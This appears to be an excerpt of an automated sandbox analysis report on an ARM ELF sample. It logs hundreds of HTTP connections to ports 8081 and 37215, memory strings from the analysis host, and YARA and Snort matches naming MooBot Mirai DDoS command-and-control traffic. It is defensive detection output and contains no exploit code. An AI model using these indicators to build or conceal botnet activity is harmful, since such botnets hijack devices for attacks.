                      Source: unknownNetwork traffic detected: HTTP traffic on port 42264 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57144 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54186 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52988 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49148 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43480 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43636 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39708 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43240 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58218 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47030 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43892 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53188 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44204 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46676 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55204 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50856 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42124 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42998 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39242 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43762 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49602 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59246 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48840 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54730 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43378 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36334 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44222 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33258 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36116 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58772 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47690 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47490 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53440 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55784 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36240 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53610 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34534 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47450 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57256 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52500 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43252 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52632 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47996 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41416 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48482 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39010 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37038 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39054 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33262 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46354 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58944 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37060 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35634 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32798 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52752 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43154 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45012 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52552 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50560 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56186 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38946 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57488 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44702 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58398 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35840 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56512 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43828 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48142 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44104 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50406 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43118 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56586 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34126 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39662 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44106 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37622 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58932 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39616 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44596 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34032 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34654 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41970 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36304 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34626 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60908 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35748 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42824 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33894 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52234 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34754 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57408 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47064 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43956 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55620 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56072 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50398 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53044 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44056 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56934 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34208 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57576 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58804 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60616 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59138 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37398 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53310 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40010 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33424 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45996 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48984 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59916 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39268 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46650 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43482 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56980 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36396 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49544 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39668 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44694 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42692 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54948 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46618 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59652 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37938 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53706 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55528 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47260 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39976 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48742 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41502 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37624 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44780 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33444 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52812 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46326 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44552 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40646 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36392 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58330 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51490 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54936 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54860 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55466 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37372 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34874 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57738 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48300 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39530 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43136 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54130 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60748 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53268 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54292 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35160 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60610 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54558 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47164 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37468 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58006 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53722 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43988 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45010 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59536 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33716 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43542 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41456 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45728 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59404 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50832 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58288 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47820 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43298 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34944 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53926 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32776 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45318 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45522 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42656 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41988 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35034 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46204 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45024 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38556 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43064 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54398 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57126 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40644 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43544 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49520 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36084 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40754 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55116 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33230 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55174 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53084 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60962 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45668 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43394 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51138 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36132 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46070 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57572 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33926 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56800 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37942 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52722 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46866 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56348 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40438 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41006 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45352 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38350 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38844 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46572 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53648 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39114 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37926 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59428 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55384 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41340 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59562 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37138 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53564 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35680 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34184 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34962 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59806 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37642 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34066 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45072 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36626 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35110 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56956 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38714 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48680 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37284 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58556 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34358 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60608 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51646 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41366 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41068 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55680 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60530 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49432 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45902 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33796 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39392 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44792 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52098 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32936 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41368 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52904 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45164 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60674 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59334 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56940 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36270 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58502 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51926 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42912 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48956 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59370 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47392 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40104 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36698 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37970 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53980 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38304 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44098 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42978 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35120 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37310 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57218 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47118 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40708 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46260 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52086 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44420 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46116 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48356 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54070 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35972 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57110 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60452 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35956 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34864 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57930 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47806 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54260 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59564 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53410 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33920 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51062 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47368 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47982 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46822 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47164 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60910 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42956 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35438 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32868 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53540 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42260 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59862 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33984 -> 37215
                      Source: /tmp/faBNhIKHq4.elf (PID: 6220)Queries kernel information via 'uname': Jump to behavior
                      Source: faBNhIKHq4.elf, 6220.1.00007fff65d18000.00007fff65d39000.rw-.sdmpBinary or memory string: ,x86_64/usr/bin/qemu-arm/tmp/faBNhIKHq4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/faBNhIKHq4.elf
                      Source: faBNhIKHq4.elf, 6220.1.0000560217974000.0000560217aa2000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                      Source: faBNhIKHq4.elf, 6220.1.0000560217974000.0000560217aa2000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
                      Source: faBNhIKHq4.elf, 6220.1.00007fff65d18000.00007fff65d39000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: faBNhIKHq4.elf, type: SAMPLE
                      Source: Yara matchFile source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: faBNhIKHq4.elf, type: SAMPLE
                      Source: Yara matchFile source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: faBNhIKHq4.elf PID: 6220, type: MEMORYSTR
                      Source: Yara matchFile source: faBNhIKHq4.elf, type: SAMPLE
                      Source: Yara matchFile source: 6220.1.00007f4cdc017000.00007f4cdc03b000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: faBNhIKHq4.elf PID: 6220, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
